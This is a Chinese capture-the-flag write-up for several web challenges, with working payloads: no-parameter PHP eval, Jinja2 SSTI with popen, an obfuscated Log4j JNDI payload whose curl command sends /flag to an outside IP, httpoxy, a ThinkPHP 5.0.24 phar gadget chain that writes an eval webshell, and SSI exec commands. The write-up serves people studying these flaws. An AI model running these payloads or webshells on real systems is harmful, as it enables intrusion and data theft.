前言 第一次被队友带飞,Tql
RCE_No_Para 无参数rce
<?php
// Challenge source ("no-parameter RCE"). Submitted code is accepted only if it is a chain of
// nested calls that take no literal arguments, e.g. a(b(c()));  — the (?R) in the pattern
// recurses into the whole expression, so stripping such a chain leaves exactly ';'.
var_dump($_GET['code']);
if (';' !== preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
    // Anything that does not fit the shape just gets the source echoed back.
    show_source(__FILE__);
} else {
    var_dump($_GET['code']);
    // Blacklist of name fragments found in well-known no-parameter gadgets
    // (session_id, end, next, getallheaders, scandir, ...), matched case-insensitively.
    if (preg_match('/session|end|next|header|dir/i', $_GET['code'])) {
        die("Hacker!");
    }
    // SECURITY: eval() of request input is the intended sink of this CTF challenge;
    // never ship anything like this outside a deliberately vulnerable target.
    eval($_GET['code']);
}
?>
payload:
?code=eval(pos(array_reverse(current(get_defined_vars()))));&b=system('cat flag.php');
说明:正则只放行形如 a(b(c())) 的无参嵌套调用。eval 运行在全局作用域,get_defined_vars() 返回的数组第一个元素通常就是 $_GET,current() 取到它,array_reverse() 后 pos() 取到最后一个参数 b 的值,再 eval 一次即执行 system('cat flag.php')。所用函数名都不含黑名单片段 session|end|next|header|dir。
Flask
本地测试发现,传入的参数都是以 `?` 为间隔来解析的。
/admin?static.js?
用这个路径成功绕过鉴权、以 admin 身份访问(推测鉴权逻辑对以 .js 等静态资源后缀结尾的 URL 放行,而 Flask 实际匹配的路由只是第一个 `?` 之前的 /admin)。
name 参数可控,测试确认存在 SSTI(Jinja2 模板注入)。
payload:
url/admin?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}?.js? 设置cookie: a=__globals__;b=cat flag
说明:借 Jinja2 全局对象 lipsum 的 __globals__ 拿到 os 模块再 popen 执行命令;`__globals__` 和命令本身都放在 Cookie 里、通过 request.cookies 读取,URL 中不出现敏感关键字(推测是为了绕过对参数的关键字过滤);末尾的 `?.js?` 沿用上面的静态后缀绕过。
Shiro?
存在Log4j 漏洞
在 vps 上启动 JNDI 服务:`java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 150.158.181.145`;要执行的命令为 `curl http://1.116.110.61:4000 -F file=@/flag`,先 base64 编码一次、再 URL 编码两次后拼入 payload(末尾的 `%253D` 即双重 URL 编码后的 `=`)。
payload(用 `${::-j}` 这类 lookup 默认值写法把 jndi/ldap 拆开,绕过简单的关键字匹配):
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://150.158.181.145:1389/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMS4xMTYuMTEwLjYxOjQwMDAgLUYgZmlsZT1AL2ZsYWc%253D}
在 vps 上提前开启监听 `nc -lvnp 4000`,触发后 curl 发来的 multipart POST 请求体中即包含 /flag 的内容。
Flag配送中心
powered by PHP 5.6.23 + fastcgi
先尝试了 9000 端口的 FastCGI 未授权访问,没有成功;扫描该 IP 的其他端口并逐个尝试也没有收获。
搜索相关漏洞,找到 CVE-2016-5385(httpoxy):PHP 5.6.23 正是 5.6.24 修复之前的受影响版本。
在请求中添加头部 `Proxy: http://vps:port`。CGI/FastCGI 会把这个请求头映射为环境变量 HTTP_PROXY,服务端随后发起的出站 HTTP 请求(推测“配送”逻辑就是这样一次请求)会经由攻击者指定的代理发出。
在 vps 的对应端口开启监听,接收服务端发出的那次请求。
tp(x)
thinkphp 5.0.24反序列化
phar反序列化
/**
 * Upload endpoint of the challenge: prints its own source, copies $_FILES, then lets
 * every GET/POST key become a local variable before the uploaded file is stored.
 */
public function upload()
{
    highlight_file(__FILE__);
    $FILES = $_FILES;
    // Variable overwrite (the intended bug): ${$_k} turns each request key into a local,
    // so a request parameter named FILES replaces the $_FILES copy taken above.
    // func() only runs addslashes() on the value, which leaves a phar:// path untouched.
    foreach ([$_GET, $_POST] as $_request) {
        foreach ($_request as $_k => $_v) {
            ${$_k} = $this->func($_v);
        }
    }
    $file = @$FILES['file']["tmp_name"];
    $filename = @$FILES['file']["name"] . '.jpg';
    move_uploaded_file($file, $filename);
    // The extension check runs after the file is already on disk, and unlink() on an
    // attacker-chosen name is a phar:// trigger: filesystem functions resolve stream wrappers,
    // and opening a phar archive unserializes its metadata.
    if (preg_match("/ph/", $filename)) {
        unlink($filename);
        die("noPHP");
    }
}

/**
 * Recursively applies addslashes() to a request value in place and returns it.
 *
 * @param mixed $var scalar or (nested) array of request values, modified by reference
 * @return mixed the escaped value
 */
public function func(&$var)
{
    if (!is_array($var)) {
        $var = addslashes($var);
        return $var;
    }
    foreach ($var as $_k => $_v) {
        $var[$_k] = $this->func($_v);
    }
    return $var;
}
ThinkPHP 5.0.24 已经修补了 5.0.x 系列的那几个 RCE,因此这题走的是反序列化链。
// Variable overwrite (the bug this write-up relies on): every GET/POST key becomes a
// local variable of the same name via ${$_k}; func() only applies addslashes() to the value.
foreach (array($_GET,$_POST) as $_request) {
    foreach ($_request as $_k => $_v) {
        ${$_k} = $this->func($_v); //$_request[$_k] = ${$_k};
    }
}
首先,上面的 foreach 把所有 GET/POST 键名都变成了同名局部变量,即变量覆盖;于是在下面这段:
// Reached only after move_uploaded_file(); with $filename attacker-controlled through the
// overwrite above, unlink('phar://...') makes PHP parse the archive and unserialize its metadata.
if(preg_match("/ph/",$filename)){ unlink($filename); die("noPHP"); }
就可以让 unlink() 去操作一个 phar:// 路径,从而触发 phar 反序列化(unlink 等文件系统函数会解析流包装器,读取 phar 时会反序列化其 metadata)。
具体做法:用 ThinkPHP 5.0.24 的反序列化链生成 phar 并改后缀上传(保存时文件名会再追加 .jpg,例如 1.jpg 会存成 1.jpg.jpg);然后再发一次请求,用 GET 参数 FILES[file][name]=phar://1.jpg 覆盖 $FILES,拼出的 $filename 为 phar://1.jpg.jpg,因含 "ph" 走到 unlink(),链子即被触发。func() 只做 addslashes,对这个路径没有影响。
exp
<?php
// Phar generator for the ThinkPHP 5.0.24 deserialization chain used in this challenge.
// Each class below only mirrors the namespace, class name and property names/visibility of
// the real ThinkPHP class, so that the serialized object graph matches what the framework's
// own code (not shown here) expects when the phar metadata is unserialized.
// Object graph: Windows.files[0] = Pivot; Pivot.parent = Output, Pivot.error = HasOne;
// HasOne.query = Query; Query.model = Output; Output.handle = Memcached;
// Memcached.handler = File; File.options['path'] = php://filter/.../public/shell.php.
// Run with `php -d phar.readonly=0 exp.php`; the CLI default (phar.readonly=1) refuses to write.
namespace think\process\pipes {
    // Presumably the chain's entry point: the framework's destructor touches every
    // entry of $files (per the original write-up; ThinkPHP source not shown here).
    class Windows {
        private $files = [];
        public function __construct($files) {
            $this->files = [$files];
        }
    }
}
namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;
        function __construct($output, $modelRelation) {
            $this->parent = $output;
            // 'getError' is the method name the chain relies on; $error holds the HasOne
            // relation object it is expected to hand back — per the original exp, verify against Model.
            $this->append = array("xxx"=>"getError");
            $this->error = $modelRelation;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
        function __construct($output, $modelRelation) {
            parent::__construct($output, $modelRelation);
        }
    }
}
namespace think\model\relation{
    // Declared before its parent on purpose; PHP defers this declaration until OneToOne exists.
    class HasOne extends OneToOne {
    }
}
namespace think\model\relation {
    abstract class OneToOne {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query) {
            $this->selfRelation = 0;
            $this->query = $query; // $query is the think\db\Query instance
            $this->bindAttr = ['xxx']; // bound attribute name; passed along as the second argument of the call chain (original note)
        }
    }
}
namespace think\db {
    class Query {
        protected $model;
        function __construct($model) {
            $this->model = $model; // $this->model is the think\console\Output instance
        }
    }
}
namespace think\console{
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle) {
            $this->styles = ['getAttr']; // method name forwarded through Output's __call (per original exp)
            $this->handle =$handle; // $handle is the think\session\driver\Memcached instance
        }
    }
}
namespace think\session\driver {
    class Memcached {
        protected $handler;
        function __construct($handle) {
            $this->handler = $handle; // $handle is the think\cache\driver\File instance
        }
    }
}
namespace think\cache\driver {
    class File {
        protected $options=null;
        protected $tag;
        function __construct(){
            // Cache driver options. 'path' is a php://filter URL: the resource= part ends in
            // /../public/shell.php, so the cache file the driver writes lands at public/shell.php,
            // and the base64 segment decodes to `<?php @eval($_POST['ccc']);?> ` (webshell, password ccc).
            // The utf-7 iconv step and the 'aaa' prefix presumably exist to neutralise the driver's
            // own file header before the base64-decode — TODO confirm against think\cache\driver\File::set().
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../public/shell.php',
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }
    }
}
namespace {
    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
    // The metadata is what gets unserialized when the archive is opened through phar://.
    // Only the __HALT_COMPILER stub matters, so the file can be renamed to any extension.
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($window);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
}
生成 phar 文件后改成 .jpg 之类不含 "ph" 的后缀上传;再按上面的方式用 FILES[file][name]=phar://<上传后的文件名> 触发。按 exp 中 File 驱动的 path 配置,webshell 会写到 public/shell.php(密码 ccc)。
upload(*)
一个上传题目,尝试绕过后缀失败,两解题目,回头学习思路
上传 php、ini、.htaccess 类型文件失败,畸形后缀/协议等绕过手段也失败;上传 .shtml 文件成功,于是尝试 SSI 注入。
`ls` 被过滤,改用 `dir /` 列目录:
<!--#exec cmd="dir /" -->
在根目录发现 flag 文件,读取它(文件名里用 `?` 通配一个字符):
<!--#exec cmd="cut -b 1-100 /ffffff?llll11111aaaaa4444ggggg" -->
另一种思路是把根目录打包到上传目录再下载(排除掉系统目录):
<!--#exec cmd="tar cvf /var/www/html/upload/d7efaae655f6177619403045edc9ae32/2.tar / --exclude=/bin --exclude=app --exclude=home --exclude=root --exclude=run --exclude=lib --exclude=sys --exclude=tmp --exclude=usr --exclude=var --exclude=mnt --exclude=opt --exclude=etc --exclude=dev --exclude=boot --exclude=bin --exclude=proc --exclude=sbin --exclude=sys --exclude=mnt --exclude=media" -->
参考 wp:长安战“疫”网络安全卫士守护赛官方 WriteUp(微信公众号,原链接缺失)
长安“战役”ctf-wp(微信公众号,原链接缺失)